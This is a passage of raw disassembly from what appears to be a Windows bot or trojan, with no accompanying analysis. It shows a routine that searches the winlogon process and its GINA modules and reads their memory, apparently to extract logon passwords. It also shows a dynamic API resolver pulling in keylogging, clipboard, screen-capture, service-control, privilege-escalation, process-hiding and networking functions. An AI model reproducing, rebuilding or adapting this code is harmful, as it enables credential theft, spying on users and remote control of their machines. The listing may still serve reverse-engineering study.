push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call ds:dword_436114
test eax, eax
jnz short loc_40793C
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_40793C
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+var_18], ecx
jb short loc_40793C
loc_4078D8: ; CODE XREF: sub_40784F+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_40792F
push 0
push 0
call ds:dword_436108
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call ds:dword_436318
test eax, eax
jnz short loc_407920
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax
call sub_417183
pop ecx
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jnz short loc_407954
loc_407920: ; CODE XREF: sub_40784F+AA�j
test edi, edi
jz short loc_40792B
push edi
call ds:dword_436110
loc_40792B: ; CODE XREF: sub_40784F+D3�j
mov eax, [esp+28h+var_10]
loc_40792F: ; CODE XREF: sub_40784F+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_4078D8
loc_40793C: ; CODE XREF: sub_40784F+6D�j
; sub_40784F+7A�j ...
xor edi, edi
loc_40793E: ; CODE XREF: sub_40784F+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4220C4 ; RtlFreeHeap
mov eax, edi
loc_40794C: ; CODE XREF: sub_40784F+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_407954: ; CODE XREF: sub_40784F+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_4079BD
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_40796A: ; CODE XREF: sub_40784F+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_417183
pop ecx
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jnz short loc_4079D1
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_417183
pop ecx
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jnz short loc_4079AF
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_4079AF: ; CODE XREF: sub_40784F+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_40796A
loc_4079BD: ; CODE XREF: sub_40784F+10F�j
test edi, edi
jz short loc_4079C8
push edi
call ds:dword_436110
loc_4079C8: ; CODE XREF: sub_40784F+170�j
mov edi, [esp+28h+var_4]
jmp loc_40793E
; ---------------------------------------------------------------------------
loc_4079D1: ; CODE XREF: sub_40784F+13C�j
xor eax, eax
jmp loc_40794C
sub_40784F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4079D8 proc near ; CODE XREF: sub_40767D+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call ds:dword_4220DC ; OpenProcess
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_407A01
xor eax, eax
jmp loc_407B7C
; ---------------------------------------------------------------------------
loc_407A01: ; CODE XREF: sub_4079D8+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call ds:dword_4220D8 ; GetSystemInfo
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, ds:dword_4220CC
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4220C8
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, ds:dword_4220D4
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_407A51
xor esi, esi
jmp loc_407B6F
; ---------------------------------------------------------------------------
loc_407A51: ; CODE XREF: sub_4079D8+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call ds:dword_4220D0 ; VirtualQueryEx
test eax, eax
jz loc_407B5E
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_407B5E
test [ebp+var_2B], 1
jnz loc_407B5E
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_407B5E
loc_407AB4: ; CODE XREF: sub_4079D8+112�j
push edi
push offset dword_435108
call sub_420B6C
pop ecx
test eax, eax
pop ecx
jnz short loc_407ADC
lea eax, [edi+200h]
push eax
push offset dword_435908
call sub_420B6C
pop ecx
test eax, eax
pop ecx
jz short loc_407AEC
loc_407ADC: ; CODE XREF: sub_4079D8+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_407B5E
jmp short loc_407AB4
; ---------------------------------------------------------------------------
loc_407AEC: ; CODE XREF: sub_4079D8+102�j
test edi, edi
jz short loc_407B5E
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_42208C ; FileTimeToLocalFileTime
test eax, eax
jz short loc_407B27
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call ds:dword_422088 ; FileTimeToSystemTime
test eax, eax
jz short loc_407B27
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_407B27: ; CODE XREF: sub_4079D8+12B�j
; sub_4079D8+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov ds:dword_43632C, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov ds:dword_436324, eax
mov ds:dword_436328, edi
loc_407B5E: ; CODE XREF: sub_4079D8+90�j
; sub_4079D8+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4220C4 ; RtlFreeHeap
mov esi, [ebp+var_10]
loc_407B6F: ; CODE XREF: sub_4079D8+74�j
push [ebp+var_4]
call ds:off_422074
pop edi
mov eax, esi
pop ebx
loc_407B7C: ; CODE XREF: sub_4079D8+24�j
pop esi
leave
retn
sub_4079D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B7F proc near ; CODE XREF: sub_40767D:loc_407775�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
call ds:dword_4220DC ; OpenProcess
test eax, eax
mov [ebp+arg_0], eax
jz loc_407C71
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call ds:dword_4220D8 ; GetSystemInfo
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_407C68
mov edi, ds:dword_4220CC
loc_407BCA: ; CODE XREF: sub_407B7F+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call ds:dword_4220D0 ; VirtualQueryEx
test eax, eax
jz short loc_407C56
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_407C5C
test [ebp+var_13], 1
jnz short loc_407C5C
push ecx
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_4220C8 ; RtlAllocateHeap
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call ds:dword_4220D4 ; ReadProcessMemory
test eax, eax
jz short loc_407C48
push offset dword_435108
push esi
call sub_420B6C
pop ecx
test eax, eax
pop ecx
jnz short loc_407C48
lea eax, [esi+400h]
push offset dword_435908
push eax
call sub_420B6C
pop ecx
test eax, eax
pop ecx
jz short loc_407C78
loc_407C48: ; CODE XREF: sub_407B7F+9F�j
; sub_407B7F+B0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_4220C4 ; RtlFreeHeap
jmp short loc_407C5C
; ---------------------------------------------------------------------------
loc_407C56: ; CODE XREF: sub_407B7F+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_407C5C: ; CODE XREF: sub_407B7F+71�j
; sub_407B7F+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_407BCA
loc_407C68: ; CODE XREF: sub_407B7F+3F�j
push [ebp+arg_0]
call ds:off_422074
loc_407C71: ; CODE XREF: sub_407B7F+1E�j
xor eax, eax
loc_407C73: ; CODE XREF: sub_407B7F+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407C78: ; CODE XREF: sub_407B7F+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov ds:dword_436324, ebx
mov ds:dword_436328, eax
cmp [eax], cl
jnz short loc_407C9A
cmp [eax+1], cl
jz short loc_407CA2
loc_407C9A: ; CODE XREF: sub_407B7F+114�j
; sub_407B7F+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_407C9A
loc_407CA2: ; CODE XREF: sub_407B7F+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
call ds:off_422074
push 1
pop eax
jmp short loc_407C73
sub_407B7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CB5 proc near ; CODE XREF: sub_40767D+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_436320
push esi
mov esi, ds:dword_4220CC
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_4220C8 ; RtlAllocateHeap
mov ecx, ds:dword_436320
mov [ebp+var_4], eax
add ecx, ecx
push ecx
push ds:dword_436328
push eax
call sub_415560
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr ds:dword_43632C
push eax
call ds:dword_43610C
push [ebp+var_4]
mov edi, offset dword_436118
push offset dword_435108
push offset dword_435908
push [ebp+arg_0]
push offset unk_4284D8
push 200h
push edi
call sub_4159FA
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4220C4 ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_407CB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D4C proc near ; CODE XREF: sub_40767D:loc_4077B9�p
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_436320
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call ds:dword_4220CC ; GetProcessHeap
push eax
call ds:dword_4220C8 ; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+var_14], eax
mov ebx, offset dword_435908
mov edi, 200h
mov esi, offset dword_434F08
loc_407D92: ; CODE XREF: sub_407D4C+FA�j
mov eax, ds:dword_436320
add eax, eax
push eax
push ds:dword_436328
push [ebp+var_14]
call sub_415560
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call ds:dword_43610C
mov eax, ds:dword_436320
and [ebp+var_10], 0
mov ecx, [ebp+var_14]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_407E07
loc_407DCF: ; CODE XREF: sub_407D4C+B3�j
cmp [ebp+var_8], 0
jz short loc_407E24
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_407DF3
cmp byte ptr [ecx+1], 0
jnz short loc_407DF3
cmp dl, 20h
jnb short loc_407DED
and [ebp+var_8], 0
loc_407DED: ; CODE XREF: sub_407D4C+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_407DF7
loc_407DF3: ; CODE XREF: sub_407D4C+90�j
; sub_407D4C+96�j
and [ebp+var_8], 0
loc_407DF7: ; CODE XREF: sub_407D4C+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_407DCF
cmp [ebp+var_8], 0
jz short loc_407E24
loc_407E07: ; CODE XREF: sub_407D4C+81�j
push [ebp+var_14]
push offset dword_435108
push ebx
push [ebp+arg_0]
push offset unk_4284D8
push edi
push esi
call sub_4159FA
add esp, 1Ch
jmp short loc_407E3C
; ---------------------------------------------------------------------------
loc_407E24: ; CODE XREF: sub_407D4C+87�j
; sub_407D4C+B9�j
push offset dword_435108
push ebx
push [ebp+arg_0]
push offset unk_428544
push edi
push esi
call sub_4159FA
add esp, 18h
loc_407E3C: ; CODE XREF: sub_407D4C+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_407D92
push [ebp+var_14]
push 0
call ds:dword_4220CC ; GetProcessHeap
push eax
call ds:dword_4220C4 ; RtlFreeHeap
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_407D4C endp
; =============== S U B R O U T I N E =======================================
sub_407E65 proc near ; CODE XREF: sub_40CB17+48�p
push ebx
push ebp
mov ebp, ds:off_4220E0
push esi
push edi
push offset aKernel32_dll_1 ; "kernel32.dll"
call ebp ; sub_4DAF8C
mov esi, ds:off_4220BC
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_407F85
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; sub_4DB076
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov ds:dword_436514, eax
call esi ; sub_4DB076
push offset aProcess32first ; "Process32First"
push edi
mov ds:dword_436488, eax
call esi ; sub_4DB076
push offset aProcess32next ; "Process32Next"
push edi
mov ds:dword_43646C, eax
call esi ; sub_4DB076
push offset aModule32first ; "Module32First"
push edi
mov ds:dword_436388, eax
call esi ; sub_4DB076
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov ds:dword_436334, eax
call esi ; sub_4DB076
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov ds:dword_436364, eax
call esi ; sub_4DB076
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov ds:dword_4363D8, eax
call esi ; sub_4DB076
push offset aSearchpatha ; "SearchPathA"
push edi
mov ds:dword_4364C8, eax
call esi ; sub_4DB076
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov ds:off_436524, eax
call esi ; sub_4DB076
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov ds:dword_436394, eax
call esi ; sub_4DB076
cmp ds:dword_436514, ebx
mov ds:dword_43637C, eax
jz short loc_407F63
cmp ds:dword_436488, ebx
jz short loc_407F63
cmp ds:dword_43646C, ebx
jz short loc_407F63
cmp ds:dword_436388, ebx
jz short loc_407F63
cmp ds:dword_436364, ebx
jz short loc_407F63
cmp ds:dword_4363D8, ebx
jz short loc_407F63
cmp ds:dword_4364C8, ebx
jz short loc_407F63
cmp ds:off_436524, ebx
jz short loc_407F63
cmp ds:dword_436394, ebx
jz short loc_407F63
cmp eax, ebx
jnz short loc_407F6D
loc_407F63: ; CODE XREF: sub_407E65+B8�j
; sub_407E65+C0�j ...
mov ds:dword_436528, 1
loc_407F6D: ; CODE XREF: sub_407E65+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; sub_4DB076
cmp eax, ebx
mov ds:dword_4364A0, eax
jz short loc_407F9A
push 1
push ebx
call eax
jmp short loc_407F9A
; ---------------------------------------------------------------------------
loc_407F85: ; CODE XREF: sub_407E65+1D�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_43652C, eax
mov ds:dword_436528, 1
loc_407F9A: ; CODE XREF: sub_407E65+117�j
; sub_407E65+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:off_4220C0
mov edi, eax
cmp edi, ebx
jz loc_4080AF
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; sub_4DB076
push offset aFindwindowa ; "FindWindowA"
push edi
mov ds:dword_4364C4, eax
call esi ; sub_4DB076
push offset aIswindow ; "IsWindow"
push edi
mov ds:dword_436474, eax
call esi ; sub_4DB076
push offset aDestroywindow ; "DestroyWindow"
push edi
mov ds:dword_436408, eax
call esi ; sub_4DB076
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov ds:dword_436518, eax
call esi ; sub_4DB076
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov ds:dword_436438, eax
call esi ; sub_4DB076
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov ds:dword_436458, eax
call esi ; sub_4DB076
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov ds:dword_4364BC, eax
call esi ; sub_4DB076
cmp ds:dword_4364C4, ebx
mov ds:dword_4363B0, eax
jz short loc_408053
cmp ds:dword_436474, ebx
jz short loc_408053
cmp ds:dword_436408, ebx
jz short loc_408053
cmp ds:dword_436518, ebx
jz short loc_408053
cmp ds:dword_436438, ebx
jz short loc_408053
cmp ds:dword_436458, ebx
jz short loc_408053
cmp ds:dword_4364BC, ebx
jz short loc_408053
cmp eax, ebx
jnz short loc_40805D
loc_408053: ; CODE XREF: sub_407E65+1B8�j
; sub_407E65+1C0�j ...
mov ds:dword_436530, 1
loc_40805D: ; CODE XREF: sub_407E65+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; sub_4DB076
push offset aGetkeystate ; "GetKeyState"
push edi
mov ds:dword_436434, eax
call esi ; sub_4DB076
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov ds:dword_436348, eax
call esi ; sub_4DB076
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov ds:dword_436404, eax
call esi ; sub_4DB076
cmp ds:dword_436434, ebx
mov ds:dword_4363F0, eax
jz short loc_4080BA
cmp ds:dword_436348, ebx
jz short loc_4080BA
cmp ds:dword_436404, ebx
jz short loc_4080BA
cmp eax, ebx
jnz short loc_4080C4
jmp short loc_4080BA
; ---------------------------------------------------------------------------
loc_4080AF: ; CODE XREF: sub_407E65+144�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_436534, eax
loc_4080BA: ; CODE XREF: sub_407E65+232�j
; sub_407E65+23A�j ...
mov ds:dword_436530, 1
loc_4080C4: ; CODE XREF: sub_407E65+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; sub_4DAF8C
mov edi, eax
cmp edi, ebx
jz loc_40825F
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; sub_4DB076
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov ds:dword_4364D8, eax
call esi ; sub_4DB076
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov ds:dword_43641C, eax
call esi ; sub_4DB076
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov ds:dword_43648C, eax
call esi ; sub_4DB076
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov ds:dword_436374, eax
call esi ; sub_4DB076
push offset aRegclosekey ; "RegCloseKey"
push edi
mov ds:dword_4363D4, eax
call esi ; sub_4DB076
cmp ds:dword_4364D8, ebx
mov ds:dword_436444, eax
jz short loc_40814F
cmp ds:dword_43641C, ebx
jz short loc_40814F
cmp ds:dword_43648C, ebx
jz short loc_40814F
cmp ds:dword_436374, ebx
jz short loc_40814F
cmp ds:dword_4363D4, ebx
jz short loc_40814F
cmp eax, ebx
jnz short loc_408159
loc_40814F: ; CODE XREF: sub_407E65+2C4�j
; sub_407E65+2CC�j ...
mov ds:dword_436538, 1
loc_408159: ; CODE XREF: sub_407E65+2E8�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; sub_4DB076
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov ds:dword_43644C, eax
call esi ; sub_4DB076
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov ds:dword_436424, eax
call esi ; sub_4DB076
cmp ds:dword_43644C, ebx
mov ds:dword_4364D4, eax
jz short loc_408194
cmp ds:dword_436424, ebx
jz short loc_408194
cmp eax, ebx
jnz short loc_40819E
loc_408194: ; CODE XREF: sub_407E65+321�j
; sub_407E65+329�j
mov ds:dword_436538, 1
loc_40819E: ; CODE XREF: sub_407E65+32D�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; sub_4DB076
push offset aOpenservicea ; "OpenServiceA"
push edi
mov ds:dword_43645C, eax
call esi ; sub_4DB076
push offset aStartservicea ; "StartServiceA"
push edi
mov ds:dword_436350, eax
call esi ; sub_4DB076
push offset aControlservice ; "ControlService"
push edi
mov ds:dword_436358, eax
call esi ; sub_4DB076
push offset aDeleteservice ; "DeleteService"
push edi
mov ds:dword_4363B8, eax
call esi ; sub_4DB076
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov ds:dword_4363BC, eax
call esi ; sub_4DB076
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov ds:dword_43636C, eax
call esi ; sub_4DB076
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov ds:dword_436428, eax
call esi ; sub_4DB076
cmp ds:dword_43645C, ebx
mov ds:dword_43635C, eax
jz short loc_408242
cmp ds:dword_436350, ebx
jz short loc_408242
cmp ds:dword_436358, ebx
jz short loc_408242
cmp ds:dword_4363B8, ebx
jz short loc_408242
cmp ds:dword_4363BC, ebx
jz short loc_408242
cmp ds:dword_43636C, ebx
jz short loc_408242
cmp ds:dword_436428, ebx
jz short loc_408242
cmp eax, ebx
jnz short loc_40824C
loc_408242: ; CODE XREF: sub_407E65+3A7�j
; sub_407E65+3AF�j ...
mov ds:dword_436538, 1
loc_40824C: ; CODE XREF: sub_407E65+3DB�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; sub_4DB076
cmp eax, ebx
mov ds:dword_436354, eax
jnz short loc_408274
jmp short loc_40826A
; ---------------------------------------------------------------------------
loc_40825F: ; CODE XREF: sub_407E65+26A�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_43653C, eax
loc_40826A: ; CODE XREF: sub_407E65+3F8�j
mov ds:dword_436538, 1
loc_408274: ; CODE XREF: sub_407E65+3F6�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; sub_4DAF8C
mov edi, eax
cmp edi, ebx
jz loc_408340
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; sub_4DB076
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov ds:dword_436454, eax
call esi ; sub_4DB076
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov ds:dword_4364AC, eax
call esi ; sub_4DB076
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov ds:dword_4364B4, eax
call esi ; sub_4DB076
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov ds:dword_436470, eax
call esi ; sub_4DB076
push offset aSelectobject ; "SelectObject"
push edi
mov ds:dword_436398, eax
call esi ; sub_4DB076
push offset aBitblt ; "BitBlt"
push edi
mov ds:dword_436344, eax
call esi ; sub_4DB076
push offset aDeletedc ; "DeleteDC"
push edi
mov ds:dword_4364B0, eax
call esi ; sub_4DB076
push offset aDeleteobject ; "DeleteObject"
push edi
mov ds:dword_436330, eax
call esi ; sub_4DB076
cmp ds:dword_436454, ebx
mov ds:dword_4363CC, eax
jz short loc_40834B
cmp ds:dword_4364AC, ebx
jz short loc_40834B
cmp ds:dword_4364B4, ebx
jz short loc_40834B
cmp ds:dword_436470, ebx
jz short loc_40834B
cmp ds:dword_436398, ebx
jz short loc_40834B
cmp ds:dword_436344, ebx
jz short loc_40834B
cmp ds:dword_4364B0, ebx
jz short loc_40834B
cmp ds:dword_436330, ebx
jz short loc_40834B
cmp eax, ebx
jnz short loc_408355
jmp short loc_40834B
; ---------------------------------------------------------------------------
loc_408340: ; CODE XREF: sub_407E65+41A�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_436544, eax
loc_40834B: ; CODE XREF: sub_407E65+49B�j
; sub_407E65+4A3�j ...
mov ds:dword_436540, 1
loc_408355: ; CODE XREF: sub_407E65+4D7�j
mov ebp, ds:off_4220C0
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz loc_408611
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; sub_4DB076
push offset aWsasocketa ; "WSASocketA"
push edi
mov ds:dword_4363E0, eax
call esi ; sub_4DB076
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov ds:dword_43650C, eax
call esi ; sub_4DB076
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov ds:dword_436384, eax
call esi ; sub_4DB076
push offset aWsaioctl ; "WSAIoctl"
push edi
mov ds:dword_436360, eax
call esi ; sub_4DB076
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov ds:dword_436414, eax
call esi ; sub_4DB076
push offset aWsacleanup ; "WSACleanup"
push edi
mov ds:dword_4363FC, eax
call esi ; sub_4DB076
push offset aSocket ; "socket"
push edi
mov ds:dword_4363C8, eax
call esi ; sub_4DB076
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov ds:dword_4364E8, eax
call esi ; sub_4DB076
push offset aConnect ; "connect"
push edi
mov ds:dword_436504, eax
call esi ; sub_4DB076
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov ds:dword_436410, eax
call esi ; sub_4DB076
push offset aInet_addr ; "inet_addr"
push edi
mov ds:dword_4364F4, eax
call esi ; sub_4DB076
push offset aHtons ; "htons"
push edi
mov ds:dword_4364A8, eax
call esi ; sub_4DB076
push offset aHtonl ; "htonl"
push edi
mov ds:dword_436468, eax
call esi ; sub_4DB076
push offset aNtohs ; "ntohs"
push edi
mov ds:dword_436464, eax
call esi ; sub_4DB076
push offset aNtohl ; "ntohl"
push edi
mov ds:dword_4363A4, eax
call esi ; sub_4DB076
push offset aSend ; "send"
push edi
mov ds:dword_43639C, eax
call esi ; sub_4DB076
push offset aSendto ; "sendto"
push edi
mov ds:dword_4364B8, eax
call esi ; sub_4DB076
push offset aRecv ; "recv"
push edi
mov ds:dword_4364CC, eax
call esi ; sub_4DB076
push offset aRecvfrom ; "recvfrom"
push edi
mov ds:dword_436480, eax
call esi ; sub_4DB076
mov ds:dword_436440, eax
push offset aBind ; "bind"
push edi
call esi ; sub_4DB076
push offset aSelect ; "select"
push edi
mov ds:dword_436494, eax
call esi ; sub_4DB076
push offset aListen ; "listen"
push edi
mov ds:dword_436450, eax
call esi ; sub_4DB076
push offset aAccept ; "accept"
push edi
mov ds:dword_436490, eax
call esi ; sub_4DB076
push offset aSetsockopt ; "setsockopt"
push edi
mov ds:dword_4364FC, eax
call esi ; sub_4DB076
push offset aGetsockname ; "getsockname"
push edi
mov ds:dword_436448, eax
call esi ; sub_4DB076
push offset aGethostname ; "gethostname"
push edi
mov ds:dword_43640C, eax
call esi ; sub_4DB076
push offset aGethostbyname ; "gethostbyname"
push edi
mov ds:dword_43647C, eax
call esi ; sub_4DB076
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov ds:dword_4364EC, eax
call esi ; sub_4DB076
push offset aGetpeername ; "getpeername"
push edi
mov ds:dword_436420, eax
call esi ; sub_4DB076
push offset aClosesocket ; "closesocket"
push edi
mov ds:dword_4363C4, eax
call esi ; sub_4DB076
cmp ds:dword_4363E0, ebx
mov ds:dword_436500, eax
jz loc_40861C
cmp ds:dword_43650C, ebx
jz loc_40861C
cmp ds:dword_436384, ebx
jz loc_40861C
cmp ds:dword_436414, ebx
jz loc_40861C
cmp ds:dword_4363FC, ebx
jz loc_40861C
cmp ds:dword_4363C8, ebx
jz loc_40861C
cmp ds:dword_4364E8, ebx
jz loc_40861C
cmp ds:dword_436504, ebx
jz loc_40861C
cmp ds:dword_436410, ebx
jz loc_40861C
cmp ds:dword_4364F4, ebx
jz loc_40861C
cmp ds:dword_4364A8, ebx
